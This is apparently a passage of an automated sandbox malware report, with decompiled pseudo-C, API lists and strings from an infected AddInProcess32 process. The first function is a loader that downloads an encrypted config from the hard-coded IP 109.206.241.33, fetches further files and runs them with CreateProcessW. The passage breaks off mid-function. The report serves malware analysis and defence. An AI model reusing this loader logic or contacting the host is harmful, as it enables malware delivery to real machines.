                                              • Opcode Fuzzy Hash: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
                                              • Instruction Fuzzy Hash: 57C15A71A412399BDB259F14DC48BAEB7B9EF08740F1444E9EE09AB240DB709ED4CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B51000(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _v8;
                                              				char _v60;
                                              				short _v580;
                                              				long _v584;
                                              				WCHAR* _v588;
                                              				intOrPtr _v592;
                                              				intOrPtr _v596;
                                              				char _v600;
                                              				intOrPtr* _v604;
                                              				struct _PROCESS_INFORMATION _v620;
                                              				struct _STARTUPINFOW _v692;
                                              				signed int _t68;
                                              				void* _t74;
                                              				WCHAR* _t76;
                                              				short _t80;
                                              				WCHAR* _t81;
                                              				WCHAR* _t84;
                                              				intOrPtr _t85;
                                              				WCHAR* _t86;
                                              				WCHAR* _t97;
                                              				short _t98;
                                              				WCHAR* _t103;
                                              				void* _t104;
                                              				void* _t115;
                                              				void* _t117;
                                              				void* _t125;
                                              				void* _t129;
                                              				intOrPtr* _t133;
                                              				signed int _t135;
                                              				WCHAR* _t136;
                                              				void* _t139;
                                              				intOrPtr _t143;
                                              				WCHAR* _t144;
                                              				intOrPtr* _t145;
                                              				void* _t149;
                                              				short* _t153;
                                              				void* _t166;
                                              				void* _t171;
                                              				void* _t172;
                                              				intOrPtr _t183;
                                              				WCHAR* _t185;
                                              				signed int _t189;
                                              				void* _t190;
                                              				long _t192;
                                              				signed int _t193;
                                              				void* _t194;
                                              				intOrPtr* _t195;
                                              
                                              				_t68 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t68 ^ _t193;
                                              				_t192 = 0;
                                              				_v600 = 0;
                                              				_t129 = HeapAlloc(GetProcessHeap(), 8, 0x200000);
                                              				_v596 = _t129;
                                              				E02B52CE7(_t71, _t129, 0x200000);
                                              				_pop(_t139);
                                              				_t74 = E02B5213B(_t129, L"http://109.206.241.33/files/1un.config.CfgEncFile", 0x200000, 0, _t139, _t129,  &_v600);
                                              				_t195 = _t194 + 0xc;
                                              				if(_t74 == 0) {
                                              					L19:
                                              					return E02B53C33(_v8 ^ _t193);
                                              				}
                                              				_t183 = 0x168;
                                              				_v592 = 0x168;
                                              				do {
                                              					_t143 =  *((intOrPtr*)(_t183 + _t129));
                                              					_t7 = _t129 + 1; // 0x1
                                              					_t171 = _t7 + _t183;
                                              					_t185 = _t183 + 0x19 + _t129;
                                              					_v588 = _t185;
                                              					_t76 = _t185;
                                              					if( *_t185 == _t192) {
                                              						L4:
                                              						_v584 = _t192;
                                              						_t133 = _v596 + 0x1b + _v592 + (_t76 - _t185 >> 1) * 2;
                                              						_t80 = 0;
                                              						_v604 = _t133;
                                              						_v580 = 0;
                                              						if(_t143 == 0) {
                                              							_t144 = 0x6d;
                                              							do {
                                              								 *((char*)(_t193 + _t80 - 0x38)) = _t144;
                                              								_t80 = _t80 + 1;
                                              								_t40 = _t80 + "midfile"; // 0x69666469
                                              								_t144 =  *_t40;
                                              								__eflags = _t144;
                                              							} while (_t144 != 0);
                                              							_t145 =  &_v60;
                                              							_t172 = _t145 + 1;
                                              							do {
                                              								_t81 =  *_t145;
                                              								_t145 = _t145 + 1;
                                              								__eflags = _t81;
                                              							} while (_t81 != 0);
                                              							E02B52AC6(_t133,  &_v580,  &_v60, _t185, _t192, _t145 - _t172);
                                              							_t84 = PathFileExistsW( &_v580);
                                              							__eflags = _t84;
                                              							if(_t84 == 0) {
                                              								L12:
                                              								_t149 = _t133 + 2;
                                              								do {
                                              									_t85 =  *_t133;
                                              									_t133 = _t133 + 2;
                                              								} while (_t85 != _t192);
                                              								_t86 = _t185;
                                              								_t135 = _t133 - _t149 >> 1;
                                              								if( *_t185 == _t192) {
                                              									goto L16;
                                              								} else {
                                              									goto L15;
                                              								}
                                              								do {
                                              									L15:
                                              									_t86 =  &(_t86[1]);
                                              								} while ( *_t86 != _t192);
                                              								goto L16;
                                              							}
                                              							DeleteFileW( &_v580);
                                              							__imp__URLDownloadToFileW(_t192, _t133,  &_v580, _t192, _t192);
                                              							__eflags = PathFileExistsW( &_v580);
                                              							if(__eflags == 0) {
                                              								goto L12;
                                              							}
                                              							_t97 = E02B53B3F(_t133,  &_v580, _v596 + _v592 + 1, _t185, _t192, __eflags);
                                              							__eflags = _t97;
                                              							if(_t97 == 0) {
                                              								goto L12;
                                              							}
                                              							_t52 =  &(_t185[1]); // 0x151
                                              							_t153 = _t52;
                                              							do {
                                              								_t98 =  *_t185;
                                              								_t185 =  &(_t185[1]);
                                              								__eflags = _t98 - _t192;
                                              							} while (_t98 != _t192);
                                              							_t189 = _t185 - _t153 >> 1;
                                              							_t136 = HeapAlloc(GetProcessHeap(), _t192, 0x21c + _t189 * 2);
                                              							__eflags = _t136;
                                              							if(_t136 != 0) {
                                              								E02B52CE7(0x21c + _t189 * 2, _t136, 0x21c + _t189 * 2);
                                              							}
                                              							_t103 = StrCatW(_t136,  &_v580);
                                              							__eflags = _t189;
                                              							if(_t189 == 0) {
                                              								_t185 = _v588;
                                              							} else {
                                              								StrCatW(_t136, " ");
                                              								_t185 = _v588;
                                              								_t103 = StrCatW(_t136, _t185);
                                              							}
                                              							_t104 = E02B52CE7(_t103,  &_v692, 0x44);
                                              							_v692.cb = 0x44;
                                              							E02B52CE7(_t104,  &_v620, 0x10);
                                              							CreateProcessW(_t192, _t136, _t192, _t192, _t192, _t192, _t192, _t192,  &_v692,  &_v620);
                                              							CloseHandle(_v620);
                                              							CloseHandle(_v620.hThread);
                                              							Sleep(0x64);
                                              							_t133 = _v604;
                                              							goto L12;
                                              						}
                                              						_t115 = E02B51D9D(_t133, _t133, _t171, _t185, _t192, _t143, _t143, _t192,  &_v584);
                                              						_t195 = _t195 + 0x10;
                                              						if(_t115 != 3) {
                                              							L8:
                                              							_t190 = _t192;
                                              							L9:
                                              							E02B52AC6(_t133,  &_v580, _t190, _t190, _t192, _v584);
                                              							 *_t195 = 0x1c00;
                                              							_t117 = E02B52AC6(_t133,  &_v580, 0x2b57468, _t190, _t192);
                                              							_pop(_t163);
                                              							_t203 = _t117;
                                              							if(_t117 != 0) {
                                              								E02B522F0(_t133,  &_v580, _t190, _t190, _t192, _t203, _v584, _v588);
                                              								_t195 = _t195 + 0xc;
                                              								HeapFree(GetProcessHeap(), _t192, _t190);
                                              							}
                                              							_t185 = _v588;
                                              							goto L12;
                                              						}
                                              						_t190 = HeapAlloc(GetProcessHeap(), 8, _v584);
                                              						E02B52CE7(_t122, _t190, _v584);
                                              						_pop(_t166);
                                              						_t125 = E02B51D9D(_t133, _t133, _v596 + _v592 + 1, _t190, _t192, _t166, _t166, _t190,  &_v584);
                                              						_t195 = _t195 + 0x10;
                                              						if(_t125 == 1) {
                                              							goto L9;
                                              						}
                                              						HeapFree(GetProcessHeap(), _t192, _t190);
                                              						goto L8;
                                              					} else {
                                              						goto L3;
                                              					}
                                              					do {
                                              						L3:
                                              						_t76 =  &(_t76[1]);
                                              					} while ( *_t76 != _t192);
                                              					goto L4;
                                              					L16:
                                              					_t129 = _v596;
                                              					_t183 = _v592 + ((_t86 - _t185 >> 1) + _t135) * 2 + 0x1d;
                                              					_v592 = _t183;
                                              				} while (_t183 + 4 != _v600);
                                              				while(E02B53A3D(_t192) == 0) {
                                              					Sleep(0x3e8);
                                              					_t192 = _t192 + 1;
                                              					if(_t192 < 0x258) {
                                              						continue;
                                              					}
                                              					goto L19;
                                              				}
                                              				goto L19;
                                              			}


















































                                              0x02b51009
                                              0x02b51010
                                              0x02b5101b
                                              0x02b51020
                                              0x02b51033
                                              0x02b51038
                                              0x02b5103e
                                              0x02b51043
                                              0x02b51052
                                              0x02b51057
                                              0x02b5105c
                                              0x02b51207
                                              0x02b51217
                                              0x02b51217
                                              0x02b51062
                                              0x02b51067
                                              0x02b5106d
                                              0x02b5106d
                                              0x02b51070
                                              0x02b51073
                                              0x02b51078
                                              0x02b5107a
                                              0x02b51080
                                              0x02b51085
                                              0x02b5108f
                                              0x02b51099
                                              0x02b510ab
                                              0x02b510ad
                                              0x02b510af
                                              0x02b510b5
                                              0x02b510be
                                              0x02b51218
                                              0x02b5121a
                                              0x02b5121a
                                              0x02b5121e
                                              0x02b5121f
                                              0x02b5121f
                                              0x02b51225
                                              0x02b51225
                                              0x02b51229
                                              0x02b5122c
                                              0x02b5122f
                                              0x02b5122f
                                              0x02b51231
                                              0x02b51232
                                              0x02b51232
                                              0x02b51242
                                              0x02b5124f
                                              0x02b51255
                                              0x02b51257
                                              0x02b5119c
                                              0x02b5119c
                                              0x02b5119f
                                              0x02b5119f
                                              0x02b511a2
                                              0x02b511a5
                                              0x02b511ac
                                              0x02b511ae
                                              0x02b511b3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b511b5
                                              0x02b511b5
                                              0x02b511b5
                                              0x02b511b8
                                              0x00000000
                                              0x02b511b5
                                              0x02b51264
                                              0x02b51275
                                              0x02b51288
                                              0x02b5128a
                                              0x00000000
                                              0x00000000
                                              0x02b512a5
                                              0x02b512aa
                                              0x02b512ac
                                              0x00000000
                                              0x00000000
                                              0x02b512b2
                                              0x02b512b2
                                              0x02b512b5
                                              0x02b512b5
                                              0x02b512b8
                                              0x02b512bb
                                              0x02b512bb
                                              0x02b512c2
                                              0x02b512da
                                              0x02b512dc
                                              0x02b512de
                                              0x02b512ea
                                              0x02b512ef
                                              0x02b512f8
                                              0x02b512fe
                                              0x02b51300
                                              0x02b5131e
                                              0x02b51302
                                              0x02b51308
                                              0x02b5130e
                                              0x02b51316
                                              0x02b51316
                                              0x02b5132c
                                              0x02b5133a
                                              0x02b51344
                                              0x02b51360
                                              0x02b51372
                                              0x02b5137a
                                              0x02b5137e
                                              0x02b51384
                                              0x00000000
                                              0x02b51384
                                              0x02b510d0
                                              0x02b510d5
                                              0x02b510db
                                              0x02b51139
                                              0x02b51139
                                              0x02b5113b
                                              0x02b51149
                                              0x02b51153
                                              0x02b51160
                                              0x02b51165
                                              0x02b51166
                                              0x02b51168
                                              0x02b5117f
                                              0x02b51184
                                              0x02b51190
                                              0x02b51190
                                              0x02b51196
                                              0x00000000
                                              0x02b51196
                                              0x02b510f8
                                              0x02b510fc
                                              0x02b5110d
                                              0x02b5111d
                                              0x02b51122
                                              0x02b51128
                                              0x00000000
                                              0x00000000
                                              0x02b51133
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b51087
                                              0x02b51087
                                              0x02b51087
                                              0x02b5108a
                                              0x00000000
                                              0x02b511bd
                                              0x02b511c9
                                              0x02b511d2
                                              0x02b511d5
                                              0x02b511de
                                              0x02b511ea
                                              0x02b511f8
                                              0x02b511fe
                                              0x02b51205
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b51205
                                              0x00000000

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51189
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51190
                                              • Sleep.KERNEL32(000003E8,?,00000000), ref: 02B511F8
                                              • PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B5124F
                                              • DeleteFileW.KERNEL32(?,?,00000000), ref: 02B51264
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 02B51275
                                              • PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B51282
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B512CD
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B512D4
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B512F8
                                              • StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B51308
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B51316
                                              • CreateProcessW.KERNEL32 ref: 02B51360
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 02B51372
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 02B5137A
                                              • Sleep.KERNEL32(00000064,?,00000000), ref: 02B5137E
                                              Strings
                                              • http://109.206.241.33/files/1un.config.CfgEncFile, xrefs: 02B5104D
                                              • D, xrefs: 02B5133A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$File$Alloc$CloseExistsFreeHandlePathSleep$CreateDeleteDownload
                                              • String ID: D$http://109.206.241.33/files/1un.config.CfgEncFile
                                              • API String ID: 1600074791-2963522458
                                              • Opcode ID: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
                                              • Instruction ID: 5672dd783a8149d5316c3ad44bc871f535f52308d2665a6a758fd98d8c43f8bf
                                              • Opcode Fuzzy Hash: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
                                              • Instruction Fuzzy Hash: 37A171729102299BDB25AF68DC88BEEB77AFF44340F1805D9E90D9B250DB309AD5CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 47%
                                              			E00402CB0(void* __ecx, WCHAR* __edi, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, char _a36, char _a40, intOrPtr _a44, char _a48, char _a56, WCHAR* _a60, char* _a64, WCHAR* _a68, WCHAR* _a72, char _a76, char _a78, char _a1104, char _a1106, signed int _a66600, signed int _a66640, intOrPtr _a66648, intOrPtr _a66652, intOrPtr _a66656, intOrPtr _a66660) {
                                              				char _v0;
                                              				char _v20;
                                              				char _v24;
                                              				char _v28;
                                              				long _v32;
                                              				intOrPtr _v36;
                                              				char* _v40;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t69;
                                              				_Unknown_base(*)()* _t79;
                                              				_Unknown_base(*)()* _t81;
                                              				char* _t83;
                                              				long _t84;
                                              				void* _t86;
                                              				long _t87;
                                              				_Unknown_base(*)()* _t93;
                                              				void* _t97;
                                              				intOrPtr _t107;
                                              				WCHAR* _t129;
                                              				void* _t131;
                                              				long _t132;
                                              				void* _t133;
                                              				intOrPtr _t135;
                                              				signed int _t137;
                                              				signed int _t138;
                                              
                                              				_t129 = __edi;
                                              				E0040B320(0x10454);
                                              				_t69 =  *0x413004; // 0x98fc836b
                                              				_a66640 = _t69 ^ _t137;
                                              				_t135 = _a66656;
                                              				_t131 = __ecx;
                                              				_a20 = _a66652;
                                              				_a12 = 0x100;
                                              				_a8 = 0x151;
                                              				_a1104 = 0;
                                              				E00409280(__edi,  &_a1106, 0, 0xfffe);
                                              				_a76 = 0;
                                              				E00409280(_t129,  &_a78, 0, 0x402);
                                              				_a32 = 0;
                                              				_a36 = 0;
                                              				_a40 = 0;
                                              				_a44 = 0;
                                              				_a28 = 0;
                                              				_a24 = 0;
                                              				_v0 = 0;
                                              				_a4 = 0;
                                              				_a48 = 0;
                                              				_a16 = 0x201;
                                              				E0040366B(E004036E5( &_a1104,  &_a1104, 0x8000, L"Please enter credentials to use for "),  &_a1104, 0x8000, _t131);
                                              				_t138 = _t137 + 0x30;
                                              				_a28 = 0x14;
                                              				_a40 = L"Sysinternals Run as Different User (Netonly)";
                                              				if(_a66648 == 0) {
                                              					_a40 = L"Sysinternals Run as Different User";
                                              				}
                                              				_a36 =  &_a1104;
                                              				_t79 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForWindowsCredentialsW");
                                              				if(_t79 == 0) {
                                              					 *_t129 = 0;
                                              					_t81 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForCredentialsW");
                                              					_a56 = 0;
                                              					_a64 = 0;
                                              					_a68 = 0;
                                              					_a60 = 0;
                                              					_a72 = 0;
                                              					_a64 =  &_a1104;
                                              					_a56 = 0x14;
                                              					_a68 = L"ShellRunas - Sysinternals: www.sysinternals.com";
                                              					_t132 =  *_t81( &_a56, _t131, 0, 0,  &_a76, _a16, _t135, _a12,  &_a48, 0x40082);
                                              					if(_t132 != 0) {
                                              						goto L12;
                                              					}
                                              					_t86 = E00403939( &_a36, 0x5c);
                                              					_t138 = _t138 + 8;
                                              					if(_t86 == 0) {
                                              						E004036E5(_t86, _v20, 0x201,  &_a36);
                                              						_t138 = _t138 + 0xc;
                                              						GetComputerNameW(_t129,  &_v32);
                                              					}
                                              					goto L9;
                                              				} else {
                                              					_t132 =  *_t79( &_a28, _a66660,  &_a24, 0, 0,  &_v0,  &_a4, 0, 0);
                                              					if(_t132 != 0) {
                                              						L12:
                                              						_t83 = _v40;
                                              						if(_t83 == 0) {
                                              							L17:
                                              							_t84 = _t132;
                                              							_pop(_t133);
                                              							_pop(_t97);
                                              							E0040318A(_t84, _t97, _a66600 ^ _t138, _t133);
                                              							return _t84;
                                              						}
                                              						_t107 = _v36;
                                              						if(_t107 == 0) {
                                              							L16:
                                              							__imp__CoTaskMemFree(_t83);
                                              							goto L17;
                                              						} else {
                                              							goto L14;
                                              						}
                                              						do {
                                              							L14:
                                              							 *_t83 = 0;
                                              							_t83 = _t83 + 1;
                                              							_t107 = _t107 - 1;
                                              						} while (_t107 != 0);
                                              						_t83 = _v40;
                                              						goto L16;
                                              					}
                                              					_a16 = _v28;
                                              					_t93 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUnPackAuthenticationBufferW");
                                              					_push( &_v24);
                                              					_push(_t135);
                                              					_push( &_a16);
                                              					_push(_t129);
                                              					_push( &_v20);
                                              					_push( &_a40);
                                              					_push(_v32);
                                              					_push(_v36);
                                              					_push(1);
                                              					if( *_t93() != 0) {
                                              						L9:
                                              						if( *_t129 != 0) {
                                              							goto L12;
                                              						}
                                              						_t87 =  &_a36;
                                              						__imp__CredUIParseUserNameW(_t87, _v20, 0x201, _t129, _v32);
                                              						L11:
                                              						_t132 = _t87;
                                              						goto L12;
                                              					}
                                              					_t87 = GetLastError();
                                              					goto L11;
                                              				}
                                              			}






























                                              0x00402cb0
                                              0x00402cb5
                                              0x00402cba
                                              0x00402cc1
                                              0x00402cd1
                                              0x00402ce0
                                              0x00402ceb
                                              0x00402cef
                                              0x00402cf7
                                              0x00402cff
                                              0x00402d07
                                              0x00402d17
                                              0x00402d1c
                                              0x00402d28
                                              0x00402d2c
                                              0x00402d30
                                              0x00402d34
                                              0x00402d45
                                              0x00402d49
                                              0x00402d4d
                                              0x00402d51
                                              0x00402d55
                                              0x00402d59
                                              0x00402d74
                                              0x00402d79
                                              0x00402d83
                                              0x00402d8b
                                              0x00402d93
                                              0x00402d95
                                              0x00402d95
                                              0x00402dae
                                              0x00402db9
                                              0x00402dc1
                                              0x00402e53
                                              0x00402e5d
                                              0x00402e6a
                                              0x00402e6e
                                              0x00402e72
                                              0x00402e76
                                              0x00402e7a
                                              0x00402e85
                                              0x00402ea6
                                              0x00402eae
                                              0x00402eb8
                                              0x00402ebc
                                              0x00000000
                                              0x00000000
                                              0x00402ec5
                                              0x00402eca
                                              0x00402ecf
                                              0x00402ee0
                                              0x00402ee5
                                              0x00402eee
                                              0x00402eee
                                              0x00000000
                                              0x00402dc7
                                              0x00402de9
                                              0x00402ded
                                              0x00402f16
                                              0x00402f16
                                              0x00402f1c
                                              0x00402f3b
                                              0x00402f42
                                              0x00402f44
                                              0x00402f46
                                              0x00402f49
                                              0x00402f54
                                              0x00402f54
                                              0x00402f1e
                                              0x00402f24
                                              0x00402f34
                                              0x00402f35
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402f26
                                              0x00402f26
                                              0x00402f26
                                              0x00402f28
                                              0x00402f2b
                                              0x00402f2b
                                              0x00402f30
                                              0x00000000
                                              0x00402f30
                                              0x00402e01
                                              0x00402e0c
                                              0x00402e16
                                              0x00402e17
                                              0x00402e1c
                                              0x00402e1d
                                              0x00402e22
                                              0x00402e2b
                                              0x00402e30
                                              0x00402e31
                                              0x00402e32
                                              0x00402e38
                                              0x00402ef4
                                              0x00402ef7
                                              0x00000000
                                              0x00000000
                                              0x00402f09
                                              0x00402f0e
                                              0x00402f14
                                              0x00402f14
                                              0x00000000
                                              0x00402f14
                                              0x00402e3e
                                              0x00000000
                                              0x00402e3e

                                              APIs
                                              • _memset.LIBCMT ref: 00402D07
                                              • _memset.LIBCMT ref: 00402D1C
                                              • _wcscpy_s.LIBCMT ref: 00402D61
                                              • _wcscat_s.LIBCMT ref: 00402D74
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForWindowsCredentialsW), ref: 00402DB2
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402DB9
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUnPackAuthenticationBufferW), ref: 00402E05
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402E0C
                                              • GetLastError.KERNEL32 ref: 00402E3E
                                              • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForCredentialsW), ref: 00402E56
                                              • GetProcAddress.KERNEL32(00000000), ref: 00402E5D
                                              • _wcschr.LIBCMT ref: 00402EC5
                                              • _wcscpy_s.LIBCMT ref: 00402EE0
                                              • GetComputerNameW.KERNEL32 ref: 00402EEE
                                              • CredUIParseUserNameW.CREDUI(?,?,00000201,?,?), ref: 00402F0E
                                              • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00402F35
                                              Strings
                                              • CredUIPromptForCredentialsW, xrefs: 00402E49
                                              • CredUnPackAuthenticationBufferW, xrefs: 00402DF7
                                              • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00402EAE
                                              • Please enter credentials to use for , xrefs: 00402D23
                                              • Sysinternals Run as Different User (Netonly), xrefs: 00402D8B
                                              • Sysinternals Run as Different User, xrefs: 00402D95
                                              • Credui.dll, xrefs: 00402DA9, 00402DFC, 00402E4E
                                              • CredUIPromptForWindowsCredentialsW, xrefs: 00402D9D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc$Name_memset_wcscpy_s$ComputerCredErrorFreeLastParseTaskUser_wcscat_s_wcschr
                                              • String ID: CredUIPromptForCredentialsW$CredUIPromptForWindowsCredentialsW$CredUnPackAuthenticationBufferW$Credui.dll$Please enter credentials to use for $ShellRunas - Sysinternals: www.sysinternals.com$Sysinternals Run as Different User$Sysinternals Run as Different User (Netonly)
                                              • API String ID: 3725605542-3868041870
                                              • Opcode ID: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                              • Instruction ID: a6c5cf5511b36f9deb478c5fb5984fdae67559a08a685e8c4f8a8008dfdfd372
                                              • Opcode Fuzzy Hash: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                              • Instruction Fuzzy Hash: A97151B1508341AFD714DF94CD859ABBBF8BFC8744F00492EF285A3290E7B59948CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 38%
                                              			E004029C0(WCHAR* __ecx, void* __eflags, WCHAR* _a4) {
                                              				signed int _v4;
                                              				signed int _v8;
                                              				char _v86;
                                              				short _v88;
                                              				char _v166;
                                              				short _v168;
                                              				char _v204;
                                              				char _v220;
                                              				char _v284;
                                              				char _v300;
                                              				WCHAR* _v768;
                                              				WCHAR* _v772;
                                              				WCHAR* _v780;
                                              				char _v784;
                                              				intOrPtr* _v788;
                                              				char _v792;
                                              				intOrPtr* _v796;
                                              				WCHAR* _v800;
                                              				char _v804;
                                              				void* _v808;
                                              				signed int _v812;
                                              				char _v844;
                                              				char _v852;
                                              				intOrPtr _v856;
                                              				char _v864;
                                              				char _v872;
                                              				char _v876;
                                              				signed int _v884;
                                              				intOrPtr* _v892;
                                              				intOrPtr* _v896;
                                              				intOrPtr* _v908;
                                              				char _v924;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t68;
                                              				signed int _t72;
                                              				intOrPtr* _t73;
                                              				intOrPtr* _t74;
                                              				intOrPtr* _t75;
                                              				intOrPtr* _t76;
                                              				signed int _t78;
                                              				intOrPtr* _t81;
                                              				signed int _t86;
                                              				intOrPtr* _t88;
                                              				signed int _t90;
                                              				intOrPtr* _t91;
                                              				intOrPtr* _t93;
                                              				intOrPtr* _t96;
                                              				intOrPtr* _t98;
                                              				signed int _t100;
                                              				intOrPtr* _t101;
                                              				signed int _t103;
                                              				intOrPtr* _t104;
                                              				intOrPtr* _t107;
                                              				char* _t109;
                                              				signed int _t111;
                                              				void* _t114;
                                              				WCHAR* _t115;
                                              				void* _t116;
                                              				signed int _t117;
                                              				WCHAR* _t120;
                                              				void* _t159;
                                              				void* _t162;
                                              				signed int _t163;
                                              				void* _t164;
                                              				void* _t165;
                                              				WCHAR* _t166;
                                              				signed int _t168;
                                              				signed int _t169;
                                              
                                              				_t168 =  &_v808;
                                              				_t68 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t68 ^ _t168;
                                              				_t166 = _a4;
                                              				_t115 = __ecx;
                                              				_v768 = __ecx;
                                              				_v792 = 0x104;
                                              				_v788 = 0;
                                              				_v804 = 0;
                                              				_v784 = 0;
                                              				_v780 = 0;
                                              				_v800 = 0;
                                              				_v796 = 0;
                                              				_v772 = 0;
                                              				_v168 = 0;
                                              				E00409280(0,  &_v166, 0, 0x4c);
                                              				_v88 = 0;
                                              				_t72 = E00409280(0,  &_v86, 0, 0x4c);
                                              				_t169 = _t168 + 0x18;
                                              				__imp__SHGetMalloc( &_v800, _t159, _t162, _t165, _t114);
                                              				_t163 = _t72;
                                              				if(_t163 < 0) {
                                              					L28:
                                              					_t73 = _v788;
                                              					if(_t73 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
                                              					}
                                              					_t74 = _v808;
                                              					if(_t74 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
                                              					}
                                              					_t120 = _v800;
                                              					if(_t120 != 0) {
                                              						_t81 = _v804;
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x14))))(_t81, _t120);
                                              					}
                                              					_t75 = _v792;
                                              					if(_t75 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t75 + 8))))(_t75);
                                              					}
                                              					_t76 = _v804;
                                              					if(_t76 != 0) {
                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
                                              					}
                                              					_pop(_t164);
                                              					_pop(_t116);
                                              					_t78 = _t163 & 0x0000ffff;
                                              					E0040318A(_t78, _t116, _v8 ^ _t169, _t164);
                                              					return _t78;
                                              				}
                                              				_t86 =  &_v792;
                                              				__imp__SHGetDesktopFolder(_t86);
                                              				_t163 = _t86;
                                              				if(_t163 < 0) {
                                              					goto L28;
                                              				}
                                              				if(SearchPathW(0, _t115, L".exe", _v800, _t166,  &_v772) != 0) {
                                              					_t88 = _v796;
                                              					_v784 = 0x1010000;
                                              					_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0xc))))(_t88, 0, 0, _t166, 0,  &_v804,  &_v784);
                                              					_t163 = _t90;
                                              					__eflags = _t163;
                                              					if(_t163 < 0) {
                                              						goto L28;
                                              					}
                                              					__eflags = _v812 & 0x00010000;
                                              					if((_v812 & 0x00010000) != 0) {
                                              						__imp__CoInitialize(0);
                                              						_t163 = _t90;
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L28;
                                              						}
                                              						__imp__CoCreateInstance(0x40d2fc, 0, 1,  &E0040D2CC,  &_v844);
                                              						_t163 = _t90;
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							L27:
                                              							__imp__CoUninitialize();
                                              							goto L28;
                                              						}
                                              						_t91 = _v864;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x14))))(_t91, _v856);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t93 = _v872;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t93))))(_t93, 0x40d2dc,  &_v852);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t96 = _v864;
